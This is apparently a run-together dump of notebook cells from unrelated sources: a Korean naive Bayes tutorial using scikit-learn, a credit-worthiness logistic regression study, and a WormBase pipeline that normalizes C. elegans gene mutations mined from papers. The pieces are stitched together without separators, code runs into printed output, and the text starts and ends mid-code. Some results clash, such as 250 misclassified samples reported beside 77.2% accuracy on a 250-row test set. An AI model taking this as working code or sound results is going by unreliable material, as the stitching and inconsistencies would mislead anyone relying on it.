plt.scatter(A, B) plt.xlabel("A") plt.ylabel("B") plt.xlim(30, 180) plt.ylim(30, 180) plt.title("A와 B의 무조건부 상관관계") plt.subplot(122) idx1 = (118 < C) & (C < 122) idx2 = (78 < C) & (C < 82) plt.scatter(A[idx1], B[idx1], label="C=120") plt.scatter(A[idx2], 
B[idx2], label="C=80") plt.xlabel("A") plt.ylabel("B") plt.xlim(30, 180) plt.ylim(30, 180) plt.legend() plt.title("B와 C의 조건부 상관관계") plt.tight_layout() plt.show()사이킷런에서 제공하는 나이브베이즈 모형np.random.seed(0) rv0 = sp.stats.multivariate_normal([-2, -2], [[1, 0.9], [0.9, 2]]) rv1 = sp.stats.multivariate_normal([2, 2], [[1.2, -0.8], [-0.8, 2]]) X0 = rv0.rvs(40) X1 = rv1.rvs(60) X = np.vstack([X0, X1]) y = np.hstack([np.zeros(40), np.ones(60)]) xx1 = np.linspace(-5, 5, 100) xx2 = np.linspace(-5, 5, 100) XX1, XX2 = np.meshgrid(xx1, xx2) plt.grid(False) plt.contour(XX1, XX2, rv0.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.cool) plt.contour(XX1, XX2, rv1.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.hot) plt.scatter(X0[:, 0], X0[:, 1], marker="o", c='b', label="y=0") plt.scatter(X1[:, 0], X1[:, 1], marker="s", c='r', label="y=1") plt.legend() plt.title("데이터의 확률분포") plt.axis("equal") plt.show() from sklearn.naive_bayes import GaussianNB model_norm = GaussianNB().fit(X, y) model_norm.classes_ model_norm.class_count_ model_norm.class_prior_각 클래스에 따라 x 가 이루는 확률분포의 모수를 계산하면 다음과 같다. 나이브 가정에 따라 x1,x2 는 독립이므로 상관관계를 구하지 않았다.model_norm.theta_[0], model_norm.sigma_[0] model_norm.theta_[1], model_norm.sigma_[1] rv0 = sp.stats.multivariate_normal(model_norm.theta_[0], model_norm.sigma_[0]) rv1 = sp.stats.multivariate_normal(model_norm.theta_[1], model_norm.sigma_[1]) xx1 = np.linspace(-5, 5, 100) xx2 = np.linspace(-5, 5, 100) XX1, XX2 = np.meshgrid(xx1, xx2) plt.grid(False) plt.contour(XX1, XX2, rv0.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.cool) plt.contour(XX1, XX2, rv1.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.hot) plt.scatter(X0[:, 0], X0[:, 1], marker="o", c='b', label="y=0") plt.scatter(X1[:, 0], X1[:, 1], marker="s", c='r', label="y=1") x_new = [0, 0] plt.scatter(x_new[0], x_new[1], c="g", marker="x", s=150, linewidth=5) plt.legend() plt.title("나이브베이즈로 추정한 데이터의 확률분포") plt.axis("equal") plt.show() model_norm.predict_proba([x_new])```이 모형을 사용하여 xnew=(0,0) 인 데이터의 y 값을 예측하자. 각 클래스값이 나올 확률은 predict_proba 메서드로 구할 수 있다. 결과는 y=0일 확률이 0.48, y=1일 확률이 0.52이다``` 구해지는 과정을 살펴보면# 가능도를 구하고 likelihood = [ (sp.stats.norm(model_norm.theta_[0][0], np.sqrt(model_norm.sigma_[0][0])).pdf(x_new[0]) * \ sp.stats.norm(model_norm.theta_[0][1], np.sqrt(model_norm.sigma_[0][1])).pdf(x_new[1])), (sp.stats.norm(model_norm.theta_[1][0], np.sqrt(model_norm.sigma_[1][0])).pdf(x_new[0]) * \ sp.stats.norm(model_norm.theta_[1][1], np.sqrt(model_norm.sigma_[1][1])).pdf(x_new[1])), ] likelihood # 사전확률을 곱해줌 # p(x)로 나누지 않았기 때문에 이 값은 확률은 아님 # 그러나 크기비교만 하면 되기 때문에 상관 없음 posterior = likelihood * model_norm.class_prior_ posterior # 확률을 구하고 싶다면 전체확률법칙을 이용하면 됨 posterior / posterior.sum()붓꽃 분류문제를 가우시안 나이브베이즈 모형을 사용하여 풀어iris=load_iris() x=iris.data y=iris.target model_norm = GaussianNB().fit(x, y) model_norm.classes_ model_norm.class_count_ model_norm.class_prior_ model_norm.theta_[0], model_norm.sigma_[0] model_norm.theta_[1], model_norm.sigma_[1] model_norm.theta_[2], model_norm.sigma_[2] y_pred=model_norm.predict(x) from sklearn.metrics import classification_report target_names=["class0","class1","class2"] print(classification_report(y,y_pred,target_names=target_names))precision recall f1-score support class0 1.00 1.00 1.00 50 class1 0.94 0.94 0.94 50 class2 0.94 0.94 0.94 50 accuracy 0.96 150 macro avg 0.96 0.96 0.96 150 weighted avg 0.96 0.96 0.96 150스무딩 ```이 데이터는 4개의 키워드를 사용하여 정상 메일 4개와 스팸 메일 6개를 BOW 인코딩한 행렬이다. 
예를 들어 첫번째 메일은 정상 메일이고 1번, 4번 키워드는 포함하지 않지만 2번, 3번 키워드를 포함한다고 볼 수 있다.```X = np.array([ [0, 1, 1, 0], [1, 1, 1, 1], [1, 1, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 1, 1, 0], [0, 1, 1, 1], [1, 0, 1, 0], [1, 0, 1, 1], [0, 1, 1, 0]]) y = np.array([0, 0, 0, 0, 1, 1, 1, 1, 1, 1]) # 이 데이터를 베르누이 나이브베이즈 모형으로 예측해 보자. from sklearn.naive_bayes import BernoulliNB model_bern = BernoulliNB().fit(X, y) model_bern.classes_ model_bern.class_count_ np.exp(model_bern.class_log_prior_) # y=0일때 1~4번단어가 포함된 횟수 # y=1일때 1~4번단어가 포함된 횟수 fc = model_bern.feature_count_ fc # y=0인케이스가 4개인데 그중 2개가 1번단어를 포함 -> 확률 0.5 # y=0인케이스가 4개인데 그중 2개가 1번단어를 포함 -> 확률 0.5 fc / np.repeat(model_bern.class_count_[:, np.newaxis], 4, axis=1) # 스무딩 되어있었던것 model_bern.alpha theta=np.exp(model_bern.feature_log_prob_) theta # 데이터를 0.5근처로 밀어버림 # 정상 메일인지 스팸메일인지 알아보기 x_new=np.array([1,1,0,0]) model_bern.predict_proba([x_new]) # 정상메일일 가능성이 약 3배임을 알 수 있다. from sklearn.datasets import load_digits digits=load_digits() x=digits.data y=digits.target x[0,:] digits.images[0,:,:] from sklearn.preprocessing import Binarizer # 위 이미지 데이터를 Binarizer적용 x2=Binarizer(7).fit_transform(x) # 7보다 크면 1로 바꿔줌 x2[0,:] plt.imshow(digits.images[0,:,:],cmap=plt.cm.binary) plt.axis("off") # 이 이미지에 대해 베르누이 나이브베이즈 모형을 적용하자. 분류 결과를 분류보고서 형식으로 나타내라. model_bern = BernoulliNB().fit(x, y) y_pred=model_bern.predict(x) print(classification_report(y,y_pred)) # BernoulliNB 클래스의 binarize인수를 사용하여 위를 풀어보기 x=digits.data y=digits.target model_bern = BernoulliNB(binarize=7).fit(x, y) y_pred=model_bern.predict(x) print(classification_report(y,y_pred)) # 왜 값이 다르지.. theta=np.exp(model_bern.feature_log_prob_) theta theta=theta.reshape(10,8,8) plt.imshow(theta[0,:,:],cmap=plt.cm.binary) plt.axis("off") # 이게 0의 평균적인 이미지A sigmoid function it is a mathematical function having a characteristic "S"-shaped curve or sigmoid curve.a sigmoid function is the logistic function. ![](https://wikimedia.org/api/rest_v1/media/math/render/svg/f6f69aad495c133ff951475da3d2ac0de3a0f571) A sigmoid function is a bounded, differentiable, real function that is defined for all real input values and has a non-negative derivative at each pointand exactly one inflection point.A sigmoid "function" and a sigmoid "curve" refer to the same object.PropertiesIn general, a sigmoid function is monotonic, and has a first derivative which is bell shaped.Conversely, the integral of any continuous, non-negative,bell-shaped function (with one local maximum and no local minimum, unless degenerate) will be sigmoidal. Thus the cumulative distribution functions for many common probability distributions are sigmoidal. One such example is the error function, which is related to the cumulative distribution function of a normal distribution.def sigmoid(x): return 1 / (1+ np.exp(-x))IntroductionCreditworthiness is the parameter that decides whether a person or company will be considered to be worthy or deserving to be given financial credit for certain period of time based on their previous repayment history.Financial institutions uses credit score for evaluating and quantifying to decide that an applicant is worthy to be given credit.The worth obtained using creditworthiness is used to decide the interest rates on credit and credit limit (the amount to be sanctioned) for the existing borrower. ObjectiveThe objective here is to build a model to 1. To take credit decisions based on individual characteristics2. 
To give an early warning to potential credit defauls Importing important librariesHere we are going to import the import libraries used for my project. The basic libraries are Pandas, Numpy, Sklearn, Mathplotlib etc. Initially, we have a notion of deciding whether a borrower is worthy or not. So, we can say that here we are going to address classification problem. So, I also imported Logistic regression model from Scikit learn. Logistic regression is a model which is used when our output class is binary (discrete). Logistic regression is used to model the probability of each class.Also, we need to evaluate the performance of our model, so I have imported metric from Scikit learn.import pandas as pd import numpy as np import warnings warnings.filterwarnings("ignore") from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler import matplotlib.pyplot as plt # Importing library for logistic regression from sklearn.linear_model import LogisticRegression # Importing performance metrics - accuracy score & confusion matrix from sklearn.metrics import accuracy_score,confusion_matrix, f1_scoreThe Seaborn is a Python library for data visualization based on matplotlib. So, it is good to use it here.import seaborn as snsGetting familiar with dataImporting the data and doing preliminiary analysisdf = pd.read_excel('CreditWorthiness.xlsx',sheet_name='Data') df.info() RangeIndex: 1000 entries, 0 to 999 Data columns (total 21 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Cbal 1000 non-null object 1 Cdur 1000 non-null int64 2 Chist 1000 non-null object 3 Cpur 1000 non-null object 4 Camt 1000 non-null int64 5 Sbal 1000 non-null object 6 Edur 1000 non-null object 7 InRate 1000 non-null int64 8 MSG 1000 non-null object 9 Oparties 1000 non-null object 10 Rdur 1000 non-null object 11 Prop 1000 non-null object 12 age 1000 non-null int64 13 inPlans 1000 non-null object 14 Htype 1000 non-null object 15 NumCred 1000 non-null int64 16 JobType 1000 non-null object 17 Ndepend 1000 non-null int64 18 telephone 1000 non-null object 19 foreign 1000 non-null [...]It looks like the data has no NAN values. Therefore, there is no need for NAN value removal and data imputation. The target variable seems to be credit score. The data has six numerical and 15 categorical variables. Looking top ten entries to see whether the data has any special charactersThe variable description is given below![image.png](attachment:image.png) The glipmse of data is given below containing five top rowsdf.head()The glimse of data containing the last five rows of datasetdf.tail()The heatmap given below will give the relation of Credit score with numerical variablesplt.figure(figsize=(15,10)) #plot heat map g=sns.heatmap(df.corr(),annot=True,vmin=0.1,vmax=0.5,cmap="YlGnBu") g.set_xticklabels(g.get_xticklabels(), rotation=90, horizontalalignment='right') g.set_yticklabels(g.get_yticklabels(), rotation=0, horizontalalignment='right')The five number summary of numerical variables of dataset is given belowdf.describe()The statistical summary of categorical variables of dataset is given belowdf.describe(include='object')Let us see how many bad or good credit score are theredf.groupby('creditScore').size()There are 300 people with bad credit score and 700 people with good credit score. 
Hard encoding bad as zero and good as one.plt.figure(figsize=(5,5)) sns.boxplot(df["creditScore"],df["age"],palette="gist_rainbow")This graphs shows that older people have good credit score If the installment rate is lower thanplt.figure(figsize=(5,5)) sns.boxplot(df["creditScore"],df["Cdur"],palette="gist_rainbow")The borrowers with higher duration of credit has bad credit scoreplt.figure(figsize=(5,5)) sns.boxplot(df["creditScore"],df["Camt"],palette="gist_rainbow")The borrower with larger amount of credit have bad credit scoredf['creditScore']=df['creditScore'].map({'bad':0, 'good':1})Encoding categorical variables into dummy variablesX = pd.get_dummies(df) df_columns_list=list(X.columns) # Separating the input names from species features=list(set(df_columns_list)-set(['creditScore']))Separating dependent and independent varriables# Storing the output values in y target=list(['creditScore']) y=X[target].values Xf=X[features] Xf.info() x = X[features].valuesThe data is split into train and test data and standardization to have zero mean and unit variance# Splitting the data into train and test train_x, test_x, train_y, test_y = train_test_split( x, y, test_size=0.25, random_state=0) # Data scaling scaler = StandardScaler() # Fit on training set only. scaler.fit(train_x) # Apply transform to both the training set and the test set. train_x = scaler.transform(train_x) test_x = scaler.transform(test_x)I prefer logistic regression model to classify the output as good or badThe logistic regression model is built and output are predicted using the built model# Make an instance of the Model logistic = LogisticRegression(penalty='l1', tol=0.01, solver='saga') # Fitting the values for x and y logistic.fit(train_x/np.std(train_x,0),train_y) print(logistic.coef_) # Prediction from test data prediction = logistic.predict(test_x)The evaluation metric used are confusion matrixThe accuracy is obtained and shown# Confusion matrix confusion_matrix = confusion_matrix(prediction,test_y) print(confusion_matrix) # Calculating the accuracy accuracy_score=accuracy_score(prediction,test_y) print(accuracy_score)[[ 40 20] [ 37 153]] 0.772It become really tough to say that the model is very good as the accuracy is 77.2%# Calculating the f1_score f1_score=f1_score(prediction,test_y) print(f1_score)0.8429752066115701But, if we look the $F_1$ score then we can say that our basic model is really good[](http://)# Printing the misclassified values from prediction print('Misclassified samples: %d' % (test_y != prediction).sum())Misclassified samples: 250101 Compiling notebook 2 outputsimport pandas as pd import math from pathlib import Path import numpy as np import re import glob import configparser import json from utils.misc.regex_block import MutationFinder, TmVar, CustomWBregex, normalize_mutations # incase you've ran the prev notebook on splits of papers data = [] for file in glob.glob("data/model_output/*.csv"): print(file) # 'WBPaper ID', 'Method', '* Genes', '* Gene-Variant combo', 'Mutation', 'Sentence' text = pd.read_csv(file).to_numpy().tolist() data = data + text data = np.array(data) # above cell takes a while to complete, so saving the data temporarily data = pd.DataFrame(data[:], columns=['WBPaper ID', 'Method', '*Genes', '*Gene-Variant combo ', 'Mutations', 'Sentence']) data.to_csv("data/model_output/processed/snippets_1.csv", index=False, encoding='utf-8') data = None2 Normalizing mutations to one-letter amino acid codes These code imports would be doing the same thing done in notebook 2, but on a much 
small subset of data.data = pd.read_csv("data/model_output/processed/snippets_1.csv") data = data.to_numpy() # 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Sentence' db_config = configparser.ConfigParser() db_config.read('utils/all_config.cfg') custom_mut_extract = CustomWBregex(db_config, locus_only=True) mf_mut_extract = MutationFinder('data/regexs/mutationfinder_regex/seth_modified.txt') tmvar_mut_extract = TmVar('data/regexs/tmvar_regex/final_regex_path') def point_mut_block(sentence, span_size=150): mut_and_snippets = [] # MutationFinder mut_and_snippets = mut_and_snippets + mf_mut_extract(sentence, span_size=span_size) # tmVar mut_and_snippets = mut_and_snippets + tmvar_mut_extract(sentence, span_size=span_size) # Custom patterns mut_and_snippets = mut_and_snippets + custom_mut_extract(sentence, span_size=span_size) if mut_and_snippets: mut_and_snippets = np.array(mut_and_snippets) mut_and_snippets = mut_and_snippets[:, 0].tolist() mut_and_snippets = list(set(mut_and_snippets)) return mut_and_snippets point_mut_block('ad465 , nucleotide 2862 of the coding region to 400 bp downstream G-to-A change at nucleotide 673 resulting in a stop codon from the stop site was amplified using primers ATGGATGAAC at amino acid 107; ad692 , T-to-G change at nucleotide 811 TATACAA') normalize_mutations('T-to-G change at nucleotide 811'), normalize_mutations('Phe230Leu'), \ normalize_mutations('C to T at nucleotide 4539'), normalize_mutations('methionine for lysine-856'), \ normalize_mutations('glycine-118 is replaced by an arginine'), normalize_mutations('1247 (valine to leucine') normalize_mutations('Phe230amber')Working with the protein mutations from regex block for now# old - 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Sentence' # new - 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' temp = [] total_count = len(data) ner_count = 0 regex_count = 0 paper_mut_count = {} print('Following mutations could NOT be normalized. Either a) normalize them manually and add in the csv file b) Make edits in the normalize_mutations fn') for i, row in enumerate(data): if row[1] != 'Regex': if row[1] == 'NER': ner_count += 1 temp.append(np.insert(data[i], -1, '').tolist()) else: paper_id = row[0] if paper_id not in paper_mut_count.keys(): paper_mut_count[paper_id] = {} regex_count += 1 norm_mutations = [] mutations = data[i, -2][1:-1].split("', '") for raw_mut in mutations: mut = point_mut_block(raw_mut) if mut: # helps filtering obvious ones for m in mut: m = m.replace(",", "") if m.find(')') != -1: if m.find('(') == -1: continue try: # takes care of filtering out bad mutations where # wild residues and mutants are same e.g G123G norm_mut = normalize_mutations(mut[0]) if norm_mut: if norm_mut not in paper_mut_count[paper_id].keys(): paper_mut_count[paper_id][norm_mut] = 0 paper_mut_count[paper_id][norm_mut] += 1 norm_mutations.append(norm_mut) except KeyError: print(m) if norm_mutations: norm_mutations = list(set(norm_mutations)) norm_mutations = "'" + "', '".join(norm_mutations) + "'" else: norm_mutations = '' temp.append(np.insert(data[i], -1, norm_mutations).tolist()) data = temp temp = None with open("data/model_output/processed/temp_paper_mut_count.json", "w") as outfile: json.dump(paper_mut_count, outfile) print('All', ner_count, 'NER data rows were ignored. 
Only', regex_count, 'regex data rows were used.') # saving things data = pd.DataFrame(data[:], columns=['WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence']) data.to_csv("data/model_output/processed/snippets_2.csv", index=False, encoding='utf-8')3 Normalizing common gene name to its WormBase IDAnd getting the gene and mutation frequency in a paper.data = pd.read_csv("data/model_output/processed/snippets_2.csv") data = data.to_numpy() # 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence'Inefficient way to do this. Have to work on better search algo.wb_genes_1 = Path('data/gsoc/Gene_alias.1.txt').read_text().split('\n') wb_genes_2 = Path('data/gsoc/Gene_alias.2.txt').read_text().split('\n') wb_genes_3 = Path('data/gsoc/Gene_alias.3.txt').read_text().split('\n') wb_genes_1 = [r.split('\t') for r in wb_genes_1] wb_genes_2 = [r.split(' ') for r in wb_genes_2] wb_genes_3 = [r.split(' ') for r in wb_genes_3] all_wb_genes = dict() for row in wb_genes_1+wb_genes_2+wb_genes_3: if row[0] not in all_wb_genes.keys(): all_wb_genes[row[0]] = [] for gene in row[1:]: if len(gene) and gene.lower() not in all_wb_genes[row[0]]: all_wb_genes[row[0]].append(gene.lower()) len(all_wb_genes) print('Total sentences: {}, processed count: '.format(len(data)), end=' ') updated_data = [] paper_wbgene_count = {} # 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' for i, row in enumerate(data): if (i+1) % 100 == 0: print(f"{i+1}", end = " ") paper_id = row[0] genes = row[2] sentence = row[-1] # checking if nan if type(genes) == float: col_genes = '' else: if paper_id not in paper_wbgene_count.keys(): paper_wbgene_count[paper_id] = {} genes = genes[1:-1].split("', '") col_genes = [] for gene in genes: for key, value in all_wb_genes.items(): if gene.lower() in value: if key not in paper_wbgene_count[paper_id]: paper_wbgene_count[paper_id][key] = 0 paper_wbgene_count[paper_id][key] += 1 col_genes.append(key) break if col_genes: col_genes = list(set(col_genes)) col_genes = "'" + "', '".join(col_genes) + "'" else: col_genes = '' updated_data.append([data[i,0], data[i,1], data[i,2], col_genes, data[i,3], data[i,4], data[i,5], data[i,6]]) data = updated_data # 'WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Sentence' updated_data = None with open("data/model_output/processed/temp_paper_wbgene_count.json", "w") as outfile: json.dump(paper_wbgene_count, outfile)Checking if any detected gene was NOT in the WB gene dictionarydata = np.array(data) data[len(data[:,2]) != len(data[:,3])] # above cell takes a while to complete, so saving the data temporarily data = pd.DataFrame(data[:], columns=['WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence']) data.to_csv("data/model_output/processed/snippets_3.csv", index=False, encoding='utf-8') data = None5 ValidationFinding the gene and mutation matches using the transcripts in c_elegans.PRJNA13758.WS281.protein.fa Get the file here - ftp://ftp.ebi.ac.uk/pub/databases/wormbase/releases/WS281/species/c_elegans/PRJNA13758/c_elegans.PRJNA13758.WS281.protein.fa.gzwb_genes_1 = Path('data/gsoc/Gene_alias.1.txt').read_text().split('\n') wb_genes_2 = Path('data/gsoc/Gene_alias.2.txt').read_text().split('\n') wb_genes_3 = Path('data/gsoc/Gene_alias.3.txt').read_text().split('\n') wb_genes_1 = [r.split('\t') for r in wb_genes_1] wb_genes_2 = 
[r.split(' ') for r in wb_genes_2] wb_genes_3 = [r.split(' ') for r in wb_genes_3] all_wb_genes = dict() for row in wb_genes_1+wb_genes_2+wb_genes_3: if row[0] not in all_wb_genes.keys(): all_wb_genes[row[0]] = [] for gene in row[1:]: if len(gene) and gene.lower() not in all_wb_genes[row[0]]: all_wb_genes[row[0]].append(gene.lower()) len(all_wb_genes) data = pd.read_csv("data/model_output/processed/snippets_3.csv") data = data.to_numpy() # 'WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' proteinfa = Path('data/gsoc/proteinfa/c_elegans.PRJNA13758.WS281.protein.fa').read_text().split('>')[1:] wb_gene_and_prot = dict() # {wbgene: [transcript, protein]} for row in proteinfa: wbgene = re.findall("WBGene[0-9]+", row)[0] protein = "".join(re.findall("\n.*", row)).replace('\n','') transcript = row.split(' ')[0] if wbgene not in wb_gene_and_prot.keys(): wb_gene_and_prot[wbgene] = [] wb_gene_and_prot[wbgene].append([transcript, protein]) len(wb_gene_and_prot)Create a pair of gene and mutation only when BOTH are present in same sentence.paper_raw_info_compiled = [] # 'WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' for row in data: ppr_id = row[0] norm_muts = row[-2] wbgenes = row[3] sentence = row[-1] gene_var = row[4] # filtering out nan values if type(norm_muts) != float and type(wbgenes) != float: norm_muts = norm_muts[1:-1].split("', '") wbgenes = wbgenes[1:-1].split("', '") for m in norm_muts: for g in wbgenes: if len(m) and len(g): paper_raw_info_compiled.append([ppr_id, g, m, sentence, gene_var]) matches = [] final_sheet = [] # ppr_id, gene, transcript for info_from_ppr in paper_raw_info_compiled: ppr_id = info_from_ppr[0] gene = info_from_ppr[1] mut = info_from_ppr[2] sent = info_from_ppr[3] gene_var = info_from_ppr[4] if not len(mut): continue if gene not in wb_gene_and_prot.keys(): continue for row in wb_gene_and_prot[gene]: transcript, protein_string = row wt_res = mut[0] pos = int(''.join(n for n in mut if n.isdigit())) mut_res = mut[-1] try: if protein_string[pos-1] == wt_res: matches.append([ppr_id, gene, mut, gene_var, transcript, sent]) except IndexError: pass for r in matches: p = r[0] p, wbg, mut, gene_var, transcript, sent = r # Adding gene common names column, again # Current code doesn't keep any link between the WB gene name and the common name g_common_name = all_wb_genes[wbg] g_common_name = ', '.join(g_common_name) final_sheet.append([p, wbg, g_common_name, mut, gene_var, transcript, sent]) len(final_sheet)Getting metadata on genes and mutations, and adding warnings columnwith open("data/model_output/processed/temp_paper_wbgene_count.json", "r") as f: paper_wbgene_count = json.loads(f.read()) with open("data/model_output/processed/temp_paper_mut_count.json", "r") as f: paper_mut_count = json.loads(f.read()) final_sheet = np.array(final_sheet) updated_sheet = [] for i, row in enumerate(final_sheet): warnings = [] paper_id = row[0] wbgene = row[1] mut = row[3] sentence = row[-1] for ppr_mut, count in paper_mut_count[paper_id].items(): if mut == ppr_mut and count == 1: warnings.append(f'{mut} mentioned only once in entire paper') break rows_with_same_mut = final_sheet[np.logical_and(final_sheet[:, 0] == paper_id, final_sheet[:,3] == mut)] same_mut_all_genes = list(set(rows_with_same_mut[:, 1])) # If the same variant is found in two different genes in the same paper - WARN! 
# It is more likely to belong to the gene it is most frequently encountered if len(same_mut_all_genes) > 1: temp_warn_store = f'{mut} was paired with other genes too:' for ppr_gene, count in paper_wbgene_count[paper_id].items(): if ppr_gene in same_mut_all_genes: temp_warn_store += (f' {ppr_gene} (seen {count} times),') warnings.append(temp_warn_store) cut_mut = re.sub("([A-Z])([0-9]+)([A-Za-z]+)", r'\1\2', mut) remaining_mut = mut.replace(cut_mut, "") same_cut_muts = [i for i,m in enumerate(final_sheet[:,3]) if (m[:len(cut_mut)] == cut_mut and m[len(cut_mut):] != remaining_mut)] if same_cut_muts: temp_warn_store = f'{mut} similar to:' for temp_i in same_cut_muts: temp_warn_store += (f' {final_sheet[:,3][temp_i]} (line {temp_i}),') warnings.append(temp_warn_store) all_muts_in_sentence = data[np.logical_and(data[:, 0] == paper_id, data[:,-1] == sentence)][:,-2] all_muts_in_sentence = all_muts_in_sentence[0][1:-1].split("', '") all_matched_muts_in_sentence = final_sheet[np.logical_and(final_sheet[:, 0] == paper_id, final_sheet[:,-1] == sentence)][:,3] all_matched_muts_in_sentence = list(set(all_matched_muts_in_sentence)) unmatched_muts_in_sentence = [m for m in all_muts_in_sentence if m not in all_matched_muts_in_sentence] if len(unmatched_muts_in_sentence) >= 2: temp_warn_store = f'Sentence has multiple mutations which did not match:' for m in unmatched_muts_in_sentence: temp_warn_store += (f' {m},') warnings.append(temp_warn_store) all_genes_with_this_mut = final_sheet[np.logical_and(final_sheet[:, 0] == paper_id, final_sheet[:, 3] == mut)][:, 1] all_genes_with_this_mut = list(set(all_genes_with_this_mut)) if len(all_genes_with_this_mut) > 3: temp_warn_store = f'{mut} was matched with {len(all_genes_with_this_mut)} genes:' for g in all_genes_with_this_mut: temp_warn_store += (f' {g},') warnings.append(temp_warn_store) if warnings: warnings = " || ".join(warnings) else: warnings = "" updated_sheet.append(np.insert(row, -1, warnings).tolist()) # saving things updated_sheet = pd.DataFrame(updated_sheet[:], columns=['WBPaper ID', 'WBGene', 'Gene', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence']) updated_sheet.to_csv("data/model_output/processed/snippets_4.csv", index=False, encoding='utf-8') updated_sheet = None6 Additional details 6.1 Strainsdata = pd.read_csv("data/model_output/processed/snippets_4.csv").to_numpy() strains = Path('data/gsoc/Strains.txt').read_text().split('\n') strains = [r.split('\t') for r in strains][:-1] all_wb_strains = dict() for row in strains: if row[0] not in all_wb_strains.keys(): all_wb_strains[row[0]] = [] for strain in row[1:]: if len(strain) and strain.lower() not in all_wb_strains[row[0]]: all_wb_strains[row[0]].append(strain.lower()) strains = [s for row in strains for s in row[1:] if len(s) and not s.isdigit()] OPENING_CLOSING_REGEXES = [r'(?:^|[^0-9A-Za-z])(', r')(?:^|[^0-9A-Za-z])'] all_strain = OPENING_CLOSING_REGEXES[0] + '|'.join(strains) + OPENING_CLOSING_REGEXES[1] all_strain = [re.compile(r,re.IGNORECASE) for r in [all_strain]] # 'WBPaper ID', 'WBGene', 'Gene', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' updated_data = [] total = len(data) print('Total sentences: {}, processed count: '.format(total), end=' ') for i, sent in enumerate(data[:, -1]): if (i+1) % 100 == 0: print(f"{i+1}", end = " ") paper_strains = [] for regex in all_strain: for m in regex.finditer(sent): span = (m.start(0), m.end(0)) raw = (sent[span[0]:span[1]]).strip() raw = raw[1:] if not raw[0].isalnum() else raw raw = raw[:-1] if not 
raw[-1].isalnum() else raw if len(raw.strip()) > 1 and not raw.strip().isdigit(): paper_strains.append(raw.strip()) if paper_strains: paper_strains = list(set(paper_strains)) col_wbid = [] for strain in paper_strains: for key, value in all_wb_strains.items(): if strain.lower() in value: col_wbid.append(key) break paper_strains = "'" + "', '".join(paper_strains) + "'" if col_wbid: col_wbid = list(set(col_wbid)) col_wbid = ", ".join(col_wbid) else: col_wbid = '' # lazy way to deal with bad snippets due to special characters in the Strains.txt file # which are caught in regex paper_strains = '' else: paper_strains = '' col_wbid = '' updated_data.append([data[i,0], data[i,1], data[i,2], col_wbid, paper_strains, data[i,3], data[i,-4], data[i,-3], data[i,-2], data[i,-1]]) data = np.array(updated_data) # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' updated_data = NoneTotal sentences: 977, processed count: 100 200 300 400 500 600 700 800 9006.2 VariantsOPENING_CLOSING_REGEXES = [r'(?:^|[^0-9A-Za-z])(', r')(?:^|[^0-9A-Za-z])'] # the allele regex and db idea was stolen from wbtools allele_designations = np.load('data/gsoc/wbtools/wb_allele_designations.npy').astype('U6') alleles_variations = np.load('data/gsoc/wbtools/wb_alleles_variations.npy').astype('U6') DB_VAR_REGEX = r'({designations}|m|p|ts|gf|lf|d|sd|am|cs)([0-9]+)' var_regex_1 = OPENING_CLOSING_REGEXES[0] + DB_VAR_REGEX.format(designations="|".join(allele_designations)) + OPENING_CLOSING_REGEXES[1] all_var = OPENING_CLOSING_REGEXES[0] + '|'.join(alleles_variations) + '|' + var_regex_1 + OPENING_CLOSING_REGEXES[1] all_var = [re.compile(r,re.IGNORECASE) for r in [all_var]] # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Mutation', 'Transcript', 'Warnings', 'Sentence' updated_data = [] total = len(data) print('Total sentences: {}, processed count: '.format(total), end=' ') for i, sent in enumerate(data[:, -1]): if (i+1) % 100 == 0: print(f"{i+1}", end = " ") variants = [] for regex in all_var: for m in regex.finditer(sent): span = (m.start(0), m.end(0)) raw = (sent[span[0]:span[1]]).strip() raw = raw[1:] if not raw[0].isalnum() else raw raw = raw[:-1] if not raw[-1].isalnum() else raw if len(raw.strip()) > 1: variants.append(raw.strip()) if variants: variants = list(set(variants)) variants = "'" + "', '".join(variants) + "'" else: variants = '' updated_data.append([data[i,0], data[i,1], data[i,2], data[i,3], data[i,4], variants, data[i,-5], data[i,-4], data[i,-3], data[i,-2], data[i,-1]]) data = np.array(updated_data) # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Variants', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' updated_data = NoneTotal sentences: 977, processed count: 100 200 300 400 500 600 700 800 9006.3 Variation typeExtraction rate would be very low as most snippets from notebook 2 are discarded due to limitation in the mutation normalization block above.Variation_type = pd.read_csv("data/gsoc/Variation_type.csv").to_numpy() Variation_type = [t.replace("_", " ") for t in Variation_type[:,2] if type(t)!=float] updated_sheet = [] # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Variants', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' for i, row in enumerate(data): sent = row[-1] col_var_type = [] for sub in 